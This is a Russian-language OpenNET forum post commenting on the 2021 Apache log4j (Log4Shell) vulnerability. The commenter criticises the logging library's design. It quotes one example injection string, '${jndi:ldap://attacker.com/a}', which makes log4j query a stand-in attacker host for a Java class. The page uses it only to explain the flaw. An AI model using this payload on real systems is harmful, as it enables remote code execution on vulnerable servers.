The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Катастрофическая уязвимость в Apache log4j, затрагивающая многие Java-проекты"
Версия для распечатки Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Исходное сообщение [ Отслеживать ]
Заметили полезную информацию ? Пожалуйста добавьте в FAQ на WIKI.
. "Катастрофическая уязвимость в Apache Log4j, затрагивающая мн..." +4 +/
Сообщение от Онаним (?), 10-Дек-21, 10:40 
>  "${jndi:ldap://attacker.com/a}", при обработке которой log4j отправит на сервер attacker.com LDAP-запрос пути к Java-классу

Макаки конечно везде одинаковые, да...
Это ж надо такую срань в систему логгирования воткнуть.
А вот просто ${var} и передачу var отдельно - ну никак было.

Ответить | Правка | Наверх | Cообщить модератору

Оглавление
Катастрофическая уязвимость в Apache log4j, затрагивающая многие Java-проекты, opennews, 10-Дек-21, 09:23  [смотреть все]
Форумы | Темы | Пред. тема | След. тема



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру